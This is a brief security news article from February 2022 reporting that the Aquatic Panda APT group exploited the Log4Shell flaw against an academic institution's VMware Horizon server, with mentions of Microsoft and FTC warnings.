Aquatic Panda APT hits the academic sector by abusing the Log4Shell flaw

February 8, 2022
Aquatic Panda APT Academic Sector Log4Shell Flaw Vulnerability Log4j

Aquatic Panda, a Chinese-speaking advanced persistent (APT) group, is seen to exploit the Log4j flaw in targeting massive academic institutions. According to researchers, the APT group has collected victims’ credentials that can be abused in their future endeavours.

Research shows that Aquatic Panda is new to the hacking scene since the researchers only noticed their activity in May of 2020. They also observed that the APT group used the latest Log4Shell for their attacks.

The researchers monitored an abnormal behaviour on an Apache Tomcat server operating on a flawed VMware Horizon instance run by a reputable academic institution. Luckily, they quickly discovered the attack before it got out of hand for the targeted universities.

 

Aquatic Panda APT abuses tools that keep their persistence tight in acquiring trade secrets and personal properties.

 

During the attack against academic institutions, the APT group operated several connectivity checks through DNK lookups on a subdomain, performing under the Apache Tomcat services held on a VMware Horizon instance. Aquatic Panda ran several Linux commands to operate some curl and get orders and then ran a bash-shell language with a hard-coded IP address.

Researchers then found that the remote server utilised for the attacks against the academic institutions is affiliated with the Aquatic Panda APT group.

As of now, the Log4shell vulnerability is abundantly used across different threat actors globally. For this reason, Microsoft warned everyone about the attacks conducted by APT groups linked to North Korea, Turkey, Iran, and China since these countries are the most abusive of the recent Log4Shell flaw.

On the other hand, the US Federal Trade Commission issued an advisory to organisations to proactively counter the flaw and legally pursue firms that will not comply with their announcement.

Log4j is part of massive applications operating on millions of systems throughout different industries; that is why attacks by threat actors have become unpredictable these days. Governments and private firms worldwide are already advising everyone regarding the abuse of the vulnerabilities in Log4j.

About the author